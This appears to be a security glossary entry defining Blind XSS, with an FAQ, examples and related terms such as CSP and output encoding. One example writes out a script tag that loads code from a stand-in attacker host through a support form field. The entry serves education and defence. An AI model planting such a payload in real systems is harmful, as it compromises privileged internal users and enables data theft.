Blind XSS
What is Blind XSS?
Blind XSSA stored XSS variant where the payload fires in a context the attacker cannot directly see, typically an internal admin panel or back-office tool.
Blind XSS is a subclass of stored XSS in which the malicious script does not execute in the attacker's own browser, but in a different, usually privileged, context — a customer-support ticket view, a fraud-review console, an internal dashboard, or a backup report. The attacker submits a payload through a public form (contact, registration, support request) and waits for an internal user to render the saved data. Detection relies on out-of-band callbacks: the payload exfiltrates data to a tracker such as XSS Hunter, Burp Collaborator, or a custom DNS/HTTP server, revealing where the script ran. Defenses are identical to stored XSS plus strong CSP on admin tools.
● Examples
- 01
A support form field containing <script src=https://x.attacker/x.js></script> that fires in the agent's CRM.
- 02
A user-agent header logged into an admin log viewer that does not encode HTML.
● Frequently asked questions
What is Blind XSS?
A stored XSS variant where the payload fires in a context the attacker cannot directly see, typically an internal admin panel or back-office tool. It belongs to the Attacks & Threats category of cybersecurity.
What does Blind XSS mean?
A stored XSS variant where the payload fires in a context the attacker cannot directly see, typically an internal admin panel or back-office tool.
How does Blind XSS work?
Blind XSS is a subclass of stored XSS in which the malicious script does not execute in the attacker's own browser, but in a different, usually privileged, context — a customer-support ticket view, a fraud-review console, an internal dashboard, or a backup report. The attacker submits a payload through a public form (contact, registration, support request) and waits for an internal user to render the saved data. Detection relies on out-of-band callbacks: the payload exfiltrates data to a tracker such as XSS Hunter, Burp Collaborator, or a custom DNS/HTTP server, revealing where the script ran. Defenses are identical to stored XSS plus strong CSP on admin tools.
How do you defend against Blind XSS?
Defences for Blind XSS typically combine technical controls and operational practices, as detailed in the full definition above.
What are other names for Blind XSS?
Common alternative names include: Out-of-band XSS.
● Related terms
- attacks№ 240
Cross-Site Scripting (XSS)
A web vulnerability that allows attackers to inject malicious scripts into pages viewed by other users, executing in the victim's browser under the site's origin.
- attacks№ 1107
Stored XSS
A persistent cross-site scripting flaw where attacker-supplied script is saved on the server and later executed in every visitor's browser.
- attacks№ 912
Reflected XSS
A non-persistent XSS where attacker-controlled input from a request is immediately reflected into the response and executed in the victim's browser.
- attacks№ 347
DOM-Based XSS
An XSS variant where the injection and execution happen entirely in the browser as client-side JavaScript writes untrusted data into a sink without sanitization.
- appsec№ 214
Content Security Policy (CSP)
An HTTP response header that tells the browser which sources of scripts, styles, frames and other content are allowed, limiting the impact of XSS and data-injection attacks.
- appsec№ 773
Output Encoding
Transforming untrusted data into a form that is safe for a specific output context — HTML, JavaScript, URL, SQL, shell — so it cannot break out and execute as code.